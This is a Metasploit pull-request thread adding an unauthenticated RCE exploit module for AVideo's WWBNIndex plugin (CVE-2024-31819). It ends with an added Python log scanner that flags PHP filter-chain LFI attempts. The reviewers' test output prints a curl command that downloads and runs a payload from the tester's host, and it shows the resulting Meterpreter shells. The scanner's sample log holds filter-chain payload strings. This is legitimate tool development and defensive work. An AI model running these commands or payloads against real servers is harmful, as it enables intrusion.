
Add Exploit Module for CVE-2024-31819 in AVideo WWBNIndex Plugin #19071

Merged: 12 commits, May 21, 2024

Conversation

Chocapikk (Contributor)

Greetings Metasploit Team,

I've developed an exploit module targeting a recently discovered vulnerability, CVE-2024-31819, in the AVideo platform's WWBNIndex plugin. This critical Remote Code Execution (RCE) vulnerability allows unauthenticated attackers to execute arbitrary code on vulnerable installations of AVideo from v12.4 to v14.2.

Module Details:

  • Vulnerability: CVE-2024-31819
  • Documentation: Included detailed steps for verification, a breakdown of the exploit's mechanics.

This module aims to provide the Metasploit community with the tools necessary to test their systems against this severe security flaw. I believe it will be a valuable addition to the Metasploit framework, aiding in the ongoing efforts to improve cybersecurity defenses.

I look forward to your feedback and am happy to make any required adjustments to meet the project's standards.

Thank you for considering this contribution.

Best regards,
Chocapikk

@smcintyre-r7 added the labels module, docs and rn-modules (release notes for new or majorly enhanced modules) Apr 10, 2024

@smcintyre-r7 (Contributor) left a comment

Thanks for this module!

Chocapikk and others added 5 commits April 11, 2024 22:14
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
@jheysel-r7 jheysel-r7 self-assigned this Apr 17, 2024
@jheysel-r7 (Contributor)

Hey @Chocapikk, thanks for the module. Another great exploit making use of PhpFilterChains!

I was wondering if you could please explain how you set up your .env file for your docker setup - specifically the SERVER_NAME (or in the older version the webSiteRootURL)?

I grabbed the vulnerable version from here and have tried a couple different configurations, however I keep seeing the following message in the docker logs:

Could not reliably determine the server's fully qualified domain name, using 172.20.0.4. Set the 'ServerName' directive globally to suppress this message

When I navigate to the endpoint the AVideo page loads but nothing on the page (javascript / css) loads because it's all getting redirected to localhost. I suspect this is all due to me incorrectly setting SERVER_NAME / webSiteRootURL.

Any help would be appreciated, thank you!
[Screenshot 2024-04-18 at 6:23:34 PM]

@Chocapikk (Contributor, Author)

Hey, about the log message, it's not supposed to be a problem.
Sorry for the late reply. You can just add a hostname in /etc/hosts on the attacker's machine, and use the same in the config in SERVER_NAME.

But it's not supposed to create any issue for vulnerability testing even with this.

@jheysel-r7 jheysel-r7 removed their assignment May 2, 2024
@jheysel-r7 jheysel-r7 self-assigned this May 14, 2024
@jheysel-r7 (Contributor) left a comment

Hey @Chocapikk - thanks for the response. I wasn't getting a session when testing and without doing much debugging I thought it might have had something to do with that issue I was seeing in the UI - my apologies. It turns out the vulnerable plugin isn't included in the 12.4 Release I downloaded.

I was able to check out an older branch: WWBN/AVideo#8369 in order to get a vulnerable version to test successfully.

The module works great, thanks for the submission. I left a couple comments which pretty much all stem from the possibility of being able to have a vulnerable version installed without the vulnerable plugin.

Testing

PHP Payload

msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected vulnerable AVideo version: 12.4, with vulnerable plugin WWBNIndex running.
[*] Sending stage (39927 bytes) to 172.16.199.131
[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.131:44440) at 2024-05-15 11:44:59 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : msfuser-virtual-machine
OS          : Linux msfuser-virtual-machine 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct  6 10:23:26 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > exit

Fetch Payload Linux

msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > run

[*] Command to run on remote host: curl -so /tmp/a http://172.16.199.1:8374/Hn-8qIL46e0vZdQpIHPToA; chmod +x /tmp/a; /tmp/a &
[*] Fetch handler listening on 172.16.199.1:8374
[*] HTTP server started
[*] Adding resource /Hn-8qIL46e0vZdQpIHPToA
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected vulnerable AVideo version: 12.4, with vulnerable plugin WWBNIndex running.
[*] Client 172.16.199.131 requested /Hn-8qIL46e0vZdQpIHPToA
[*] Sending payload to 172.16.199.131 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.16.199.131
[*] Meterpreter session 8 opened (172.16.199.1:4444 -> 172.16.199.131:55714) at 2024-05-15 11:46:54 -0700


meterpreter >
meterpreter > getuid
Server username: www-data
sysinfmeterpreter > sysinfo
Computer     : 172.16.199.131
OS           : Ubuntu 22.04 (Linux 6.2.0-35-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Chocapikk and others added 6 commits May 15, 2024 22:06
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
…th_rce.md

@Chocapikk (Contributor, Author)

Hey @jheysel-r7 ,

Thanks for checking out my PR and for the helpful feedback! I've made the changes you suggested, and it's all looking good now. Really appreciate your help.

@Chocapikk Chocapikk requested a review from jheysel-r7 May 16, 2024 08:50
@jheysel-r7 (Contributor)

Anytime @Chocapikk, thanks for making those changes!

I've retested and everything looks great, landing now 👍

msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected vulnerable AVideo version: 12.4, with vulnerable plugin WWBNIndex running.
[*] Sending stage (39927 bytes) to 172.16.199.131
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:33702) at 2024-05-21 14:19:17 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : msfuser-virtual-machine
OS          : Linux msfuser-virtual-machine 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct  6 10:23:26 UTC 2 x86_64
Meterpreter : php/linux
meterpreter >

@jheysel-r7 jheysel-r7 closed this pull request by merging all changes into rapid7:master in 10acd86 May 21, 2024
@jheysel-r7 (Contributor)

Release Notes

Add module for CVE-2024-31819 which exploits an LFI in AVideo which uses PHP Filter Chaining to turn the LFI into unauthenticated RCE.
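The release note describes the bug class: a local file inclusion that PHP filter chaining turns into code execution. As an added, defender-side example (not part of the PR or the Metasploit module), the script below triages web-server access logs for the wrapper and chained convert.iconv steps that this technique leaves in request URLs; the log lines and the `/index.php?file=` parameter are constructed, not AVideo's real endpoint.

```python
"""Flag PHP filter-chain style LFI attempts in access logs (defender-side triage)."""
import re
from typing import List, Optional
from urllib.parse import unquote

# Apache/nginx combined log: client ip, identity, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Hallmarks of the technique: the php://filter wrapper, and for the chain variant
# several convert.iconv.* conversions chained with '|' to synthesise arbitrary bytes.
FILTER_WRAPPER = re.compile(r"php://filter", re.IGNORECASE)
ICONV_STEP = re.compile(r"convert\.iconv\.[\w.-]+", re.IGNORECASE)


def classify_target(target: str) -> Optional[str]:
    """Return 'filter-chain', 'php-wrapper' or None for one request target."""
    decoded = unquote(unquote(target))  # tolerate single and double URL encoding
    if not FILTER_WRAPPER.search(decoded):
        return None
    if len(ICONV_STEP.findall(decoded)) >= 2:
        return "filter-chain"
    return "php-wrapper"  # plain php://filter read attempt, still an LFI probe


def scan_log(lines: List[str]) -> List[dict]:
    """Parse each log line and collect the requests that look like filter-chain LFI."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined log format; skip rather than guess
        verdict = classify_target(m["target"])
        if verdict:
            findings.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "verdict": verdict})
    return findings


# Constructed sample log (RFC 5737 documentation addresses, hypothetical endpoint).
SAMPLE_LOG = [
    '203.0.113.5 - - [15/May/2024:11:44:59 -0700] "GET /index.php?file=home HTTP/1.1" 200 512',
    '198.51.100.7 - - [15/May/2024:11:45:01 -0700] "GET /index.php?file=php%3A%2F%2Ffilter%2F'
    'convert.iconv.UTF8.UTF16%7Cconvert.base64-encode%7Cconvert.iconv.UTF16.UTF8%2Fresource%3D'
    'php%3A%2F%2Ftemp HTTP/1.1" 200 8192',
    '198.51.100.7 - - [15/May/2024:11:45:03 -0700] "GET /index.php?file=php://filter/'
    'convert.base64-encode/resource=index.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['verdict']}: {f['target']}")
```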
